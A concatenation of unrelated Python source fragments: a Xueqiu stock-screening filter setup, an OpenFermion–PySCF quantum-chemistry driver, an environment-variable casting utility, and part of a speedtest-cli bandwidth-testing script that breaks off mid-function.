# stable.append_roediluted('20101231', '10')
# stable.append_roediluted('20091231', '8')
stable.append_income_grow('20160930')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20160930')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20160930')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20160930')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def faster_short():
fast = XueqiuApi('faster_short')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '18', is_order_by_this=True)
fast.append_roediluted('20151231', '18')
fast.append_roediluted('20141231', '10')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_income_grow('20161231', '7')
fast.append_income_grow('20151231', '7')
fast.append_income_grow('20141231', '7')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_profie_grow('20161231', '12')
fast.append_profie_grow('20151231', '12')
fast.append_profie_grow('20141231', '12')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
return fast
@staticmethod
def fast():
fast = XueqiuApi('fast')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '15')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '5')
fast.append_income_grow('20151231', '5')
fast.append_income_grow('20141231', '5')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '10')
fast.append_profie_grow('20151231', '10')
fast.append_profie_grow('20141231', '10')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
@staticmethod
def faster():
fast = XueqiuApi('faster')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '15')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '7')
fast.append_income_grow('20151231', '7')
fast.append_income_grow('20141231', '7')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '12')
fast.append_profie_grow('20151231', '12')
fast.append_profie_grow('20141231', '12')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
@staticmethod
def fastest():
fast = XueqiuApi('fastest')
fast.append_pettm('0', '30')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '10')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '10')
fast.append_income_grow('20151231', '10')
fast.append_income_grow('20141231', '10')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '18')
fast.append_profie_grow('20151231', '18')
fast.append_profie_grow('20141231', '18')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Driver to initialize molecular object from pyscf program."""
from __future__ import absolute_import
from functools import reduce
import numpy
from pyscf import gto, scf, ao2mo, ci, cc, fci, mp
from openfermion import MolecularData
from openfermionpyscf import PyscfMolecularData
def prepare_pyscf_molecule(molecule):
"""
This function creates and saves a pyscf input file.
Args:
molecule: An instance of the MolecularData class.
Returns:
pyscf_molecule: A pyscf molecule instance.
"""
pyscf_molecule = gto.Mole()
pyscf_molecule.atom = molecule.geometry
pyscf_molecule.basis = molecule.basis
pyscf_molecule.spin = molecule.multiplicity - 1
pyscf_molecule.charge = molecule.charge
pyscf_molecule.symmetry = False
pyscf_molecule.build()
return pyscf_molecule
def compute_scf(pyscf_molecule):
"""
Perform a Hartree-Fock calculation.
Args:
pyscf_molecule: A pyscf molecule instance.
Returns:
pyscf_scf: A PySCF "SCF" calculation object.
"""
if pyscf_molecule.spin:
pyscf_scf = scf.ROHF(pyscf_molecule)
else:
pyscf_scf = scf.RHF(pyscf_molecule)
return pyscf_scf
def compute_integrals(pyscf_molecule, pyscf_scf):
"""
Compute the 1-electron and 2-electron integrals.
Args:
pyscf_molecule: A pyscf molecule instance.
pyscf_scf: A PySCF "SCF" calculation object.
Returns:
one_electron_integrals: An N by N array storing h_{pq}
two_electron_integrals: An N by N by N by N array storing h_{pqrs}.
"""
# Get one electrons integrals.
n_orbitals = pyscf_scf.mo_coeff.shape[1]
one_electron_compressed = reduce(numpy.dot, (pyscf_scf.mo_coeff.T,
pyscf_scf.get_hcore(),
pyscf_scf.mo_coeff))
one_electron_integrals = one_electron_compressed.reshape(
n_orbitals, n_orbitals).astype(float)
# Get two electron integrals in compressed format.
two_electron_compressed = ao2mo.kernel(pyscf_molecule,
pyscf_scf.mo_coeff)
two_electron_integrals = ao2mo.restore(
1, # no permutation symmetry
two_electron_compressed, n_orbitals)
# See PQRS convention in OpenFermion.hamiltonians._molecular_data
# h[p,q,r,s] = (ps|qr)
two_electron_integrals = numpy.asarray(
two_electron_integrals.transpose(0, 2, 3, 1), order='C')
# Return.
return one_electron_integrals, two_electron_integrals
def run_pyscf(molecule,
run_scf=True,
run_mp2=False,
run_cisd=False,
run_ccsd=False,
run_fci=False,
verbose=False):
"""
This function runs a pyscf calculation.
Args:
molecule: An instance of the MolecularData or PyscfMolecularData class.
run_scf: Optional boolean to run SCF calculation.
run_mp2: Optional boolean to run MP2 calculation.
run_cisd: Optional boolean to run CISD calculation.
run_ccsd: Optional boolean to run CCSD calculation.
run_fci: Optional boolean to FCI calculation.
verbose: Boolean whether to print calculation results to screen.
Returns:
molecule: The updated PyscfMolecularData object. Note the attributes
of the input molecule are also updated in this function.
"""
# Prepare pyscf molecule.
pyscf_molecule = prepare_pyscf_molecule(molecule)
molecule.n_orbitals = int(pyscf_molecule.nao_nr())
molecule.n_qubits = 2 * molecule.n_orbitals
molecule.nuclear_repulsion = float(pyscf_molecule.energy_nuc())
# Run SCF.
pyscf_scf = compute_scf(pyscf_molecule)
pyscf_scf.verbose = 0
pyscf_scf.run()
molecule.hf_energy = float(pyscf_scf.e_tot)
if verbose:
print('Hartree-Fock energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.hf_energy))
# Hold pyscf data in molecule. They are required to compute density
# matrices and other quantities.
molecule._pyscf_data = pyscf_data = {}
pyscf_data['mol'] = pyscf_molecule
pyscf_data['scf'] = pyscf_scf
# Populate fields.
molecule.canonical_orbitals = pyscf_scf.mo_coeff.astype(float)
molecule.orbital_energies = pyscf_scf.mo_energy.astype(float)
# Get integrals.
one_body_integrals, two_body_integrals = compute_integrals(
pyscf_molecule, pyscf_scf)
molecule.one_body_integrals = one_body_integrals
molecule.two_body_integrals = two_body_integrals
molecule.overlap_integrals = pyscf_scf.get_ovlp()
# Run MP2.
if run_mp2:
if molecule.multiplicity != 1:
print("WARNING: RO-MP2 is not available in PySCF.")
else:
pyscf_mp2 = mp.MP2(pyscf_scf)
pyscf_mp2.verbose = 0
pyscf_mp2.run()
# molecule.mp2_energy = pyscf_mp2.e_tot # pyscf-1.4.4 or higher
molecule.mp2_energy = pyscf_scf.e_tot + pyscf_mp2.e_corr
pyscf_data['mp2'] = pyscf_mp2
if verbose:
print('MP2 energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.mp2_energy))
# Run CISD.
if run_cisd:
pyscf_cisd = ci.CISD(pyscf_scf)
pyscf_cisd.verbose = 0
pyscf_cisd.run()
molecule.cisd_energy = pyscf_cisd.e_tot
pyscf_data['cisd'] = pyscf_cisd
if verbose:
print('CISD energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.cisd_energy))
# Run CCSD.
if run_ccsd:
pyscf_ccsd = cc.CCSD(pyscf_scf)
pyscf_ccsd.verbose = 0
pyscf_ccsd.run()
molecule.ccsd_energy = pyscf_ccsd.e_tot
pyscf_data['ccsd'] = pyscf_ccsd
if verbose:
print('CCSD energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.ccsd_energy))
# Run FCI.
if run_fci:
pyscf_fci = fci.FCI(pyscf_molecule, pyscf_scf.mo_coeff)
pyscf_fci.verbose = 0
molecule.fci_energy = pyscf_fci.kernel()[0]
pyscf_data['fci'] = pyscf_fci
if verbose:
print('FCI energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.fci_energy))
# Return updated molecule instance.
pyscf_molecular_data = PyscfMolecularData.__new__(PyscfMolecularData)
pyscf_molecular_data.__dict__.update(molecule.__dict__)
pyscf_molecular_data.save()
return pyscf_molecular_data
def generate_molecular_hamiltonian(
geometry,
basis,
multiplicity,
charge=0,
n_active_electrons=None,
n_active_orbitals=None):
"""Generate a molecular Hamiltonian with the given properties.
Args:
geometry: A list of tuples giving the coordinates of each atom.
An example is [('H', (0, 0, 0)), ('H', (0, 0, 0.7414))].
Distances in angstrom. Use atomic symbols to
specify atoms.
basis: A string giving the basis set. An example is 'cc-pvtz'.
Only optional if loading from file.
multiplicity: An integer giving the spin multiplicity.
charge: An integer giving the charge.
n_active_electrons: An optional integer specifying the number of
electrons desired in the active space.
n_active_orbitals: An optional integer specifying the number of
spatial orbitals desired in the active space.
Returns:
The Hamiltonian as an InteractionOperator.
"""
# Run electronic structure calculations
molecule = run_pyscf(
MolecularData(geometry, basis, multiplicity, charge)
)
# Freeze core orbitals and truncate to active space
if n_active_electrons is None:
n_core_orbitals = 0
occupied_indices = None
else:
n_core_orbitals = (molecule.n_electrons - n_active_electrons) // 2
occupied_indices = list(range(n_core_orbitals))
if n_active_orbitals is None:
active_indices = None
else:
active_indices = list(range(n_core_orbitals,
n_core_orbitals + n_active_orbitals))
return molecule.get_molecular_hamiltonian(
occupied_indices=occupied_indices,
active_indices=active_indices)
|
|
from __future__ import unicode_literals, print_function
import os
import sys
import logging
import json
from decimal import Decimal, InvalidOperation
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
class ImproperlyConfigured(Exception):
"""Configuration Exception
Imported from Django if available, otherwise defined as
a simple subclass of Exception
"""
pass
try:
from django.utils.six import string_types
except ImportError:
if sys.version_info[0] == 3:
string_types = (str,)
text_type = str
else:
string_types = (basestring,)
text_type = unicode
__version__ = '0.1.1'
NOTSET = type(str('NoValue'), (object,), {})
logger = logging.getLogger(__name__)
class Environment(object):
"""Class for reading and casting environment variables
This class presents the main interface for interacting with the
environment. Once instantiated, it can either be called as a function,
or any of the convenience methods can be used.
Args:
environ (`dict`): Environment to read variables from
"""
_collections = (dict, list, set, tuple)
_lists = (list, set, tuple)
def __init__(self, environ):
self.environ = environ
def __call__(self, var, default=NOTSET, cast=None, force=True):
"""Function interface
Once the environment has been initialised, it can be called as a
function. This is necessary to provide custom casting, or it can
sometimes be preferred for consistency.
Examples:
Casting an environment variable:
>>> env = Environment({'MY_VAR': '1'})
>>> env('MY_VAR', cast=int)
1
Providing a default:
>>> env = Environment({})
>>> env('ANOTHER_VAR', default='value')
"value"
Args:
var (`str`): The name of the environment variable
default: The value to return if the environment variable does not
exist
cast: type or function for casting environment variable. See
casting
force (`bool`): Whether to force casting of the default value
Returns:
The environment variable if it exists, otherwise default
Raises:
ImproperlyConfigured
"""
return self._get(var, default=default, cast=cast, force=force)
def __contains__(self, var):
"""Test if an environment variable exists
Allows using the ``in`` operator to test if an environment variable
exists.
Examples:
>>> env = Environment({'MY_VAR': '1'})
>>> 'MY_VAR' in env
True
>>> 'ANOTHER_VAR' in env
False
"""
return var in self.environ
# Simple builtins
def bool(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a bool"""
return self._get(var, default=default, cast=bool, force=force)
def float(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a float"""
return self._get(var, default=default, cast=float, force=force)
def int(self, var, default=NOTSET, force=True):
"""Convenience method for casting to an int"""
return self._get(var, default=default, cast=int, force=force)
def str(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a str"""
return self._get(var, default=default, cast=text_type, force=force)
# Builtin collections
def tuple(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a tuple
Note:
Casting
"""
return self._get(var, default=default, cast=(cast,), force=force)
def list(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a list
Note:
Casting
"""
return self._get(var, default=default, cast=[cast], force=force)
def set(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a set
Note:
Casting
"""
return self._get(var, default=default, cast={cast}, force=force)
def dict(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a dict
Note:
Casting
"""
return self._get(var, default=default, cast={str: cast}, force=force)
# Other types
def decimal(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a decimal.Decimal
Note:
Casting
"""
return self._get(var, default=default, cast=Decimal, force=force)
def json(self, var, default=NOTSET, force=True):
"""Get environment variable, parsed as a json string"""
return self._get(var, default=default, cast=json.loads, force=force)
def url(self, var, default=NOTSET, force=True):
"""Get environment variable, parsed with urlparse/urllib.parse"""
return self._get(var, default=default, cast=urlparse.urlparse,
force=force)
# Private API
def _get(self, var, default=NOTSET, cast=None, force=True):
# Find the value in the environ
# If the value is missing, use the default or raise an error
try:
value = self.environ[var]
except KeyError:
if default is NOTSET:
msg = "Set the environment variable '{}'".format(var)
raise ImproperlyConfigured(msg)
else:
value = default
# Cast value if:
# 1. it is different than the default
# 2. we force, and default different from None
if (value != default) or (force and default is not None):
value = self._cast(var, value, cast)
return value
def _cast(self, var, value, cast):
if cast is None:
pass
elif cast is bool:
if not isinstance(value, bool):
if value is True or value.lower() == 'true':
value = True
elif value is False or value.lower() == 'false':
value = False
else:
msg = ("Environment variable '{}' could not be parsed "
"as bool: value {} must be 'true' or 'false'")
raise ImproperlyConfigured(msg.format(var, value))
elif cast is int:
# Allow _ as separators to increase legibility
if isinstance(value, string_types):
value = value.replace('_', '')
try:
value = int(value)
except ValueError as e:
msg = ("Environment variable '{}' could not be parsed "
"as int: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
elif cast is float:
# Allow _ as separators to increase legibility
if isinstance(value, string_types):
value = value.replace('_', '')
try:
value = float(value)
except ValueError as e:
msg = ("Environment variable '{}' could not be parsed "
"as float: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
elif cast is Decimal:
try:
value = Decimal(value)
except InvalidOperation:
msg = ("Environment variable '{}' could not be parsed "
"as Decimal: {}")
raise ImproperlyConfigured(msg.format(var, value))
elif cast in self._lists:
if isinstance(value, self._lists):
value = cast(value)
elif isinstance(value, string_types):
parts = value.split(',')
value = cast([p.strip() for p in parts if p.strip()])
else:
msg = "Cannot cast environment variable '{}' from {} to {}"
formatted = msg.format(var, type(value), type(cast))
raise ImproperlyConfigured(formatted)
elif isinstance(cast, self._lists):
if len(cast) != 1:
msg = ("Cast for environment variable '{}' is not valid: "
"cast must be a {} of length 1")
raise ImproperlyConfigured(msg.format(var, type(cast)))
# Convert to a list, since sets do not support indexing
icast = list(cast)[0]
if (icast in self._collections or
isinstance(icast, self._collections)):
msg = ("Cast for environment variable '{}' is not valid: "
"It is not possible to cast to nested collections")
raise ImproperlyConfigured(msg.format(var))
parts = self._cast(var, value, type(cast))
value = type(cast)([self._cast(var, p, icast) for p in parts])
elif cast is dict:
if isinstance(value, dict):
pass
elif isinstance(value, string_types):
parts = [i.strip() for i in value.split(',') if i.strip()]
items = [p.split('=', 1) for p in parts]
value = {k.strip(): v.strip() for k, v in items}
else:
msg = "Cannot cast environment variable '{}' from {} to {}"
formatted = msg.format(var, type(value), type(cast))
raise ImproperlyConfigured(formatted)
elif isinstance(cast, dict):
if len(cast) != 1:
msg = ("Cast for environment variable '{}' is not valid: "
"cast must be a dict of length 1")
raise ImproperlyConfigured(msg.format(var))
keycast, valcast = list(cast.items())[0]
if (keycast in self._collections or
isinstance(keycast, self._collections) or
valcast in self._collections or
isinstance(valcast, self._collections)):
msg = ("Cast for environment variable '{}' is not valid: "
"It is not possible to cast to nested collections")
raise ImproperlyConfigured(msg.format(var))
parts = self._cast(var, value, dict)
value = {self._cast(var, k, keycast): self._cast(var, v, valcast)
for k, v in parts.items()}
else:
try:
value = cast(value)
except Exception as e:
msg = ("Cast for environment variable '{}' could not "
"be parsed: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
return value
# Export an initialized environment for convenience
env = Environment(os.environ)
|
|
#! /Users/Nest/anaconda/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import os
import re
import signal
import socket
import sys
import threading
import time
import timeit
# These are things that I added
import pandas as pd
__version__ = '0.3.2'
# Some global variables we use
user_agent = 'speedtest-cli/%s' % __version__
source = None
shutdown_event = None
# Used for bound_interface
socket_socket = socket.socket
# Make some lists to hold upload and download speed values
download = []
upload = []
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
class SpeedtestCliServerListError(Exception):
"""Internal Exception class used to indicate to move on to the next
URL for retrieving speedtest.net server details
"""
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) +
math.cos(math.radians(lat1)) *
math.cos(math.radians(lat2)) * math.sin(dlon / 2) *
math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
def build_request(url, data=None, headers={}):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
headers['User-Agent'] = user_agent
return Request(url, data=data, headers=headers)
def catch_request(request):
"""Helper function to catch common exceptions encountered when
establishing a connection with a HTTP/HTTPS request
"""
try:
uh = urlopen(request)
return uh
except (HTTPError, URLError, socket.error):
return False
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
request = build_request(self.url)
f = urlopen(request)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
request = build_request(self.url, data=self.data)
f = urlopen(request)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
request = build_request('https://www.speedtest.net/speedtest-config.php')
uh = catch_request(request)
if uh is False:
print_('Could not retrieve speedtest.net configuration')
sys.exit(1)
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
urls = [
'https://www.speedtest.net/speedtest-servers-static.php',
'http://c.speedtest.net/speedtest-servers-static.php',
]
servers = {}
for url in urls:
try:
request = build_request(url)
uh = catch_request(request)
if uh is False:
raise SpeedtestCliServerListError
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
uh.close()
raise SpeedtestCliServerListError
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
raise SpeedtestCliServerListError
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']),
float(client['lon'])],
[float(attrib.get('lat')),
float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
except SpeedtestCliServerListError:
continue
# We were able to fetch and parse the list of speedtest.net servers
if servers:
break
if not servers:
print_('Failed to retrieve list of speedtest.net servers')
sys.exit(1)
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
headers = {'User-Agent': user_agent}
start = timeit.default_timer()
h.request("GET", urlparts[2], headers=headers)
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source, isp_name
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
